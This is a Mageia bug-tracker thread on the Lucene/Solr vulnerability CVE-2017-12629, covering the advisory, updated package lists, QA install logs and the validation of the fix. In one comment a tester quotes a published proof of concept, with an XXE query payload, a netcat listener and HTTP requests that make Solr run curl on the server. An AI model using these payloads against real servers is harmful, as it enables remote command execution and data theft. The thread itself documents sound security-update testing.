Bug 21976 - lucene new security issue CVE-2017-12629
Summary: lucene new security issue CVE-2017-12629
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 6
Hardware: All Linux
Priority: Normal critical
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA6-32-OK MGA6-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2017-11-03 18:00 CET by David Walser
Modified: 2017-11-06 09:23 CET (History)
5 users (show)

See Also:
Source RPM: lucene-6.1.0-1.mga7.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2017-11-03 18:00:44 CET
Fedora has issued an advisory on October 31:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4VSRNALKTFGMXF7R2WI7KXI3NSLHT7FM/

Mageia 6 is also affected.  Mageia 5 is not affected.
David Walser 2017-11-03 18:01:06 CET

CC: (none) => geiger.david68210
Whiteboard: (none) => MGA6TOO

Comment 1 David Walser 2017-11-03 18:11:39 CET
Fedora advisory from November 1 (corresponds to Mageia 6 version):
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V/
Comment 2 David GEIGER 2017-11-04 04:30:56 CET
Fixed for Cauldron and mga6!
Comment 3 David Walser 2017-11-04 16:49:05 CET
Advisory:
========================

Updated lucene packages fix security vulnerability:

It was found that the CoreParser class in Lucene accepts doctype declaration
and expands external entities. An attacker could use this flaw to bypass
security restrictions and access sensitive data (CVE-2017-12629).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12629
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V/
========================

Updated packages in core/updates_testing:
========================
lucene-5.5.0-4.1.mga6
lucene-parent-5.5.0-4.1.mga6
lucene-solr-grandparent-5.5.0-4.1.mga6
lucene-backward-codecs-5.5.0-4.1.mga6
lucene-benchmark-5.5.0-4.1.mga6
lucene-replicator-5.5.0-4.1.mga6
lucene-grouping-5.5.0-4.1.mga6
lucene-highlighter-5.5.0-4.1.mga6
lucene-misc-5.5.0-4.1.mga6
lucene-test-framework-5.5.0-4.1.mga6
lucene-memory-5.5.0-4.1.mga6
lucene-expressions-5.5.0-4.1.mga6
lucene-demo-5.5.0-4.1.mga6
lucene-classification-5.5.0-4.1.mga6
lucene-join-5.5.0-4.1.mga6
lucene-suggest-5.5.0-4.1.mga6
lucene-facet-5.5.0-4.1.mga6
lucene-analysis-5.5.0-4.1.mga6
lucene-sandbox-5.5.0-4.1.mga6
lucene-queries-5.5.0-4.1.mga6
lucene-spatial-5.5.0-4.1.mga6
lucene-spatial3d-5.5.0-4.1.mga6
lucene-codecs-5.5.0-4.1.mga6
lucene-queryparser-5.5.0-4.1.mga6
lucene-analyzers-smartcn-5.5.0-4.1.mga6
lucene-analyzers-phonetic-5.5.0-4.1.mga6
lucene-analyzers-icu-5.5.0-4.1.mga6
lucene-analyzers-morfologik-5.5.0-4.1.mga6
lucene-analyzers-uima-5.5.0-4.1.mga6
lucene-analyzers-kuromoji-5.5.0-4.1.mga6
lucene-analyzers-stempel-5.5.0-4.1.mga6
lucene-javadoc-5.5.0-4.1.mga6

from lucene-5.5.0-4.1.mga6.src.rpm

CC: (none) => mageia
Assignee: mageia => qa-bugs
Version: Cauldron => 6
Whiteboard: MGA6TOO => (none)

Lewis Smith 2017-11-05 13:29:45 CET

Keywords: (none) => advisory
CC: (none) => lewyssmith

Lewis Smith 2017-11-05 13:29:59 CET

CC: lewyssmith => (none)

Comment 4 Len Lawrence 2017-11-05 17:22:15 CET
Mageia 6 on x86_64
Before updating, all the lucene packages were installed, over 200 of them.

Read this first:
http://www.lucenetutorial.com/basic-concepts.html
Lucene In Five Minutes provides a 'Hello World' type application
The first hurdle was to find javac.
Install java-1.8.0-openjdk-devel.
The second hurdle is insurmountable - note that the tutorial says the program is complete:
$ javac HelloLucene.java 
HelloLucene.java:1: error: package org.apache.lucene.analysis.standard does not exist
import org.apache.lucene.analysis.standard.StandardAnalyzer;

and a whole load of similar errors.
So there must be another element of lucene missing.

Reproducing the issues is a complex business involving cut and paste.
A way to demonstrate the vulnerabilities has been posted by
Michael Stepankin & Olga Barinova
https://www.exploit-db.com/exploits/43009/
a:
1) Set up a listener on any port by using netcat command "nc -lv 4444"
2) Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}
b:
1) Create a new collection
   http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2
2) Set up a listener on any port by using netcat command "nc -lv 4444"
3) Add a new RunExecutableListener listener for the collection where "exe" attribute contents the name of running command ("/usr/bin/curl") and "args" attribute contents "http://localhost:39601/executed" value to make a request to the attacker's netcat listener:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198
 
{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://localhost:4444/executed"]
  }
}
4) Update "newcollection" to trigger execution of RunExecutableListener:
POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 19
 
[{"id":"test"}]
5) ou will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server.

They also describe how the vulnerabilities can be chained to provide remote code execution....

Install netcat-traditional for the nc command if it cannot be found.
Opened port 4444 as /tcp and /udp.
$ nc -lv 4444
4444: inverse host lookup failed: Unknown host
listening on [any] 39601 ...
Cut and pasted the http command into firefox:
http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2
 Unable to connect
  Firefox can't establish a connection to the server at localhost:8983

Going to pass this one on to somebody/anybody with more experience of both java and web applications.

Meanwhile I can verify that the updates installed cleanly; 32 specific components.

CC: (none) => tarazed25

Comment 5 William Kenney 2017-11-05 22:43:43 CET
In VirtualBox, M6, Plasma, 64-bit

Package(s) under test:
lucene lucene-parent lucene-backward-codecs
lucene-benchmark lucene-replicator lucene-grouping

default install of lucene lucene-parent lucene-backward-codecs &
lucene-benchmark lucene-replicator lucene-grouping

185 packages installed

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.mga6.noarch is already installed

185 packages installed without error

install lucene lucene-parent lucene-backward-codecs lucene-benchmark
lucene-replicator lucene-grouping from updates_testing

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.1.mga6.noarch is already installed

All packages installed without error

CC: (none) => wilcal.int

Comment 6 William Kenney 2017-11-05 23:06:05 CET
In VirtualBox, M6, Plasma, 32-bit

Package(s) under test:
lucene lucene-parent lucene-backward-codecs
lucene-benchmark lucene-replicator lucene-grouping

default install of lucene lucene-parent lucene-backward-codecs &
lucene-benchmark lucene-replicator lucene-grouping

185 packages installed

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.mga6.noarch is already installed

185 packages installed without error

install lucene lucene-parent lucene-backward-codecs lucene-benchmark
lucene-replicator lucene-grouping from updates_testing

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.1.mga6.noarch is already installed

All packages installed without error
Comment 7 William Kenney 2017-11-05 23:07:09 CET
I don't know how much more you can do with this other then starting
a career understanding it.
Comment 8 David Walser 2017-11-05 23:19:20 CET
William is right.  Let's move this along.
Comment 9 William Kenney 2017-11-05 23:37:42 CET
This update works fine.
Testing complete for MGA6, 32-bit & 64-bit
Validating the update.
Could someone from the sysadmin team push to updates.
Thanks

Whiteboard: (none) => MGA6-32-OK MGA6-64-OK

William Kenney 2017-11-05 23:38:31 CET

Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs

Comment 10 Mageia Robot 2017-11-06 09:23:38 CET
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2017-0403.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED


Note You need to log in before you can comment on or make changes to this bug.